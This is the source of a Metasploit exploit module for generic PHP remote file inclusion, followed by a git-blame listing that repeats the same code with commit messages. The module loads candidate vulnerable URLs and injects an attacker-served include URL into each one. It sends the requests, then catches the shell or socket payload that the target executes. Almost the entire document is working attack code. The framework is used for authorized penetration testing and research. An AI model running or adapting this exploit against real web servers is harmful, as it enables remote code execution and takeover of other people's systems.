modules/exploits/unix/webapp/php_include.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::HttpServer::PHPInclude

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'PHP Remote File Include Generic Exploit',
			'Description'    => %q{
					This module can be used to exploit any generic PHP file include vulnerability,
				where the application includes code like the following:

				<?php include($_GET['path']); ?>
			},
			'Author'         => [ 'hdm' , 'egypt' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => [ ],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Compat'      =>
						{
							'ConnectionType' => 'find',
						},
					# Arbitrary big number. The payload gets sent as an HTTP
					# response body, so really it's unlimited
					'Space'       => 262144, # 256k
				},
			'DefaultOptions' =>
				{
					'WfsDelay' => 30
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        => [[ 'Automatic', { }]],
			'DefaultTarget' => 0))

		register_options([
			OptString.new('PATH', [ true , "The base directory to prepend to the URL to try", '/']),
			OptString.new('PHPURI', [false, "The URI to request, with the include parameter changed to XXpathXX"]),
			OptPath.new('PHPRFIDB', [false, "A local file containing a list of URLs to try, with XXpathXX replacing the URL",
				File.join(Msf::Config.install_root, "data", "exploits", "php", "rfi-locations.dat")
				])
			], self.class)
	end

	def check
		uri = datastore['PHPURI'] ? datastore['PHPURI'].dup : ""
		if(uri and ! uri.empty?)
			uri.gsub!(/\?.*/, "")
			print_status("Checking uri #{uri}")
			response = send_request_raw({ 'uri' => uri})
			if response.code == 200
				return Exploit::CheckCode::Detected
			end
			print_error("Server responded with #{response.code}")
			return Exploit::CheckCode::Safe
		else
			return Exploit::CheckCode::Unknown
		end
	end

	def php_exploit

		uris = []

		tpath = datastore['PATH']
		if tpath[-1,1] == '/'
			tpath = tpath.chop
		end

		# PHPURI overrides the PHPRFIDB list
		if (datastore['PHPURI'] and not datastore['PHPURI'].empty?)
			uris << datastore['PHPURI'].strip.gsub('XXpathXX', Rex::Text.to_hex(php_include_url, "%"))
		else
			print_status("Loading RFI URLs from the database...")
			::File.open(datastore['PHPRFIDB'], "rb") do |fd|
				fd.read(fd.stat.size).split(/\n/).each do |line|
					line.strip!
					next if line.empty?
					next if line =~ /^#/
					next if line !~ /^\//

					uris << line.gsub('XXpathXX',
						Rex::Text.to_hex(php_include_url.sub(/\?$/, '') + '?', "%") # ? append is required
					)
				end
			end
			uris.uniq!
			print_status("Loaded #{uris.length} URLs")
		end

		# Very short timeout because the request may never return if we're
		# sending a socket payload
		timeout = 0.01

		# We can't make this parallel without breaking PHP findsock
		# Findsock payloads cause this loop to run slowly
		uris.each do |uri|
			break if session_created?

			# print_status("Sending #{tpath+uri}")
			begin
				response = send_request_raw( {
					'global' => true,
					'uri'    => tpath+uri,
				}, timeout)

				handler
			rescue ::Interrupt
				raise $!
			rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused
				print_error("The target service unreachable")
				break
			rescue ::OpenSSL::SSL::SSLError
				print_error("The target failed to negotiate SSL, is this really an SSL service?")
				break
			rescue ::Exception => e
				print_error("Exception #{e.class} #{e}")
			end
		end
	end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`# $Id$`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

			`##`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`# This file is part of the Metasploit Framework and may be subject to`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
replacing defunct framework URL in header comments in most modules and pcap_log 2009-04-13 14:33:26 +00:00			`# http://metasploit.com/framework/`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

Initial support for PHP payloads 2006-12-17 07:57:51 +00:00			`require 'msf/core'`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`Rank = ExcellentRanking`
Initial support for PHP payloads 2006-12-17 07:57:51 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::Remote::HttpServer::PHPInclude`
Initial support for PHP payloads 2006-12-17 07:57:51 +00:00
			`def initialize(info = {})`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`super(update_info(info,`
			`'Name' => 'PHP Remote File Include Generic Exploit',`
Initial support for PHP payloads 2006-12-17 07:57:51 +00:00			`'Description' => %q{`
finished periodic missing CVE reference check (hint vulns w/o CVEs here!) 2010-03-10 05:58:01 +00:00			`This module can be used to exploit any generic PHP file include vulnerability,`
			`where the application includes code like the following:`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00
finished periodic missing CVE reference check (hint vulns w/o CVEs here!) 2010-03-10 05:58:01 +00:00			`<?php include($_GET['path']); ?>`
Initial support for PHP payloads 2006-12-17 07:57:51 +00:00			`},`
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. 2008-09-24 04:41:51 +00:00			`'Author' => [ 'hdm' , 'egypt' ],`
Initial support for PHP payloads 2006-12-17 07:57:51 +00:00			`'License' => MSF_LICENSE,`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`'Version' => '$Revision$',`
finished periodic missing CVE reference check (hint vulns w/o CVEs here!) 2010-03-10 05:58:01 +00:00			`'References' => [ ],`
Initial support for PHP payloads 2006-12-17 07:57:51 +00:00			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'DisableNops' => true,`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`'Compat' =>`
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. 2008-09-24 04:41:51 +00:00			`{`
			`'ConnectionType' => 'find',`
			`},`
update space requirements 2010-06-02 05:04:24 +00:00			`# Arbitrary big number. The payload gets sent as an HTTP`
			`# response body, so really it's unlimited`
			`'Space' => 262144, # 256k`
Initial support for PHP payloads 2006-12-17 07:57:51 +00:00			`},`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`'DefaultOptions' =>`
			`{`
see #684 , adds checksum support, updates modules to use it, fixes some wfs_delay/WfsDelay issues 2010-08-25 20:55:37 +00:00			`'WfsDelay' => 30`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`},`
Initial support for PHP payloads 2006-12-17 07:57:51 +00:00			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP,`
			`'Targets' => [[ 'Automatic', { }]],`
			`'DefaultTarget' => 0))`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00
finished periodic missing CVE reference check (hint vulns w/o CVEs here!) 2010-03-10 05:58:01 +00:00			`register_options([`
			`OptString.new('PATH', [ true , "The base directory to prepend to the URL to try", '/']),`
			`OptString.new('PHPURI', [false, "The URI to request, with the include parameter changed to XXpathXX"]),`
			`OptPath.new('PHPRFIDB', [false, "A local file containing a list of URLs to try, with XXpathXX replacing the URL",`
			`File.join(Msf::Config.install_root, "data", "exploits", "php", "rfi-locations.dat")`
			`])`
			`], self.class)`
Initial support for PHP payloads 2006-12-17 07:57:51 +00:00			`end`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00
add a simple check for the generic php exploits 2009-09-10 05:24:03 +00:00			`def check`
Fixes #2974 . Adds an "Unknown" level to Exploit::CheckCode, fixes the URI check for exploit/unix/webapp/php_include (which was relying on Unknown). 2010-10-15 12:24:17 +00:00			`uri = datastore['PHPURI'] ? datastore['PHPURI'].dup : ""`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`if(uri and ! uri.empty?)`
			`uri.gsub!(/\?.*/, "")`
			`print_status("Checking uri #{uri}")`
			`response = send_request_raw({ 'uri' => uri})`
			`if response.code == 200`
			`return Exploit::CheckCode::Detected`
			`end`
			`print_error("Server responded with #{response.code}")`
			`return Exploit::CheckCode::Safe`
			`else`
			`return Exploit::CheckCode::Unknown`
add a simple check for the generic php exploits 2009-09-10 05:24:03 +00:00			`end`
			`end`
More reliable reverse shell 2008-03-04 07:34:26 +00:00
Initial support for PHP payloads 2006-12-17 07:57:51 +00:00			`def php_exploit`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00
			`uris = []`
finished periodic missing CVE reference check (hint vulns w/o CVEs here!) 2010-03-10 05:58:01 +00:00
Added a path to prepend 2010-02-16 05:24:31 +00:00			`tpath = datastore['PATH']`
			`if tpath[-1,1] == '/'`
			`tpath = tpath.chop`
			`end`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00
			`# PHPURI overrides the PHPRFIDB list`
			`if (datastore['PHPURI'] and not datastore['PHPURI'].empty?)`
			`uris << datastore['PHPURI'].strip.gsub('XXpathXX', Rex::Text.to_hex(php_include_url, "%"))`
			`else`
			`print_status("Loading RFI URLs from the database...")`
			`::File.open(datastore['PHPRFIDB'], "rb") do \|fd\|`
			`fd.read(fd.stat.size).split(/\n/).each do \|line\|`
			`line.strip!`
			`next if line.empty?`
			`next if line =~ /^#/`
			`next if line !~ /^\//`

			`uris << line.gsub('XXpathXX',`
			`Rex::Text.to_hex(php_include_url.sub(/\?$/, '') + '?', "%") # ? append is required`
			`)`
			`end`
			`end`
			`uris.uniq!`
			`print_status("Loaded #{uris.length} URLs")`
			`end`

			`# Very short timeout because the request may never return if we're`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`# sending a socket payload`
			`timeout = 0.01`

Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`# We can't make this parallel without breaking PHP findsock`
			`# Findsock payloads cause this loop to run slowly`
			`uris.each do \|uri\|`
			`break if session_created?`
More reliable reverse shell 2008-03-04 07:34:26 +00:00
Ensure that errors in the PHPInclude mixin lead to the service being stopped. Handle unreachable services in the php_include module better. Fix database-enabled tab completion to be workspace friendly 2010-09-21 02:52:49 +00:00			`# print_status("Sending #{tpath+uri}")`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`begin`
			`response = send_request_raw( {`
			`'global' => true,`
Added a path to prepend 2010-02-16 05:24:31 +00:00			`'uri' => tpath+uri,`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`}, timeout)`

			`handler`
			`rescue ::Interrupt`
			`raise $!`
Ensure that errors in the PHPInclude mixin lead to the service being stopped. Handle unreachable services in the php_include module better. Fix database-enabled tab completion to be workspace friendly 2010-09-21 02:52:49 +00:00			`rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused`
			`print_error("The target service unreachable")`
			`break`
Quit when we get an SSL exception 2010-09-25 03:14:21 +00:00			`rescue ::OpenSSL::SSL::SSLError`
jduck the grammar checker strikes again (thanks!) 2010-09-25 04:54:10 +00:00			`print_error("The target failed to negotiate SSL, is this really an SSL service?")`
Quit when we get an SSL exception 2010-09-25 03:14:21 +00:00			`break`
Ensure that errors in the PHPInclude mixin lead to the service being stopped. Handle unreachable services in the php_include module better. Fix database-enabled tab completion to be workspace friendly 2010-09-21 02:52:49 +00:00			`rescue ::Exception => e`
			`print_error("Exception #{e.class} #{e}")`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`end`
			`end`
			`end`
make php findsock work again for php_eval and php_include 2009-06-20 05:50:52 +00:00			`end`